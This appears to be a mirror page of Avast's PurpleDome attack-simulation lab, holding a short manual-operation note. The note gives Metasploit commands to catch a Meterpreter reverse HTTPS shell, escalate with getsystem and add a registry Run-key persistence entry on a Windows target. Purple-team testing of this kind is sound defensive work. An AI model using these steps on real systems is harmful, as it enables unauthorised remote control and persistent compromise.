mirror of https://github.com/avast/PurpleDome
You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
378 B
378 B
Manual operation
target: start babymetal.exe
attacker:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.178.189 (YMMV) set LPORT 6666 (YMMV) run 100.64.0.25 on kali 100.64.0.25 on win
getsystem reg setval -k HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -v purpledome -d c:\windows\system32\calc.exe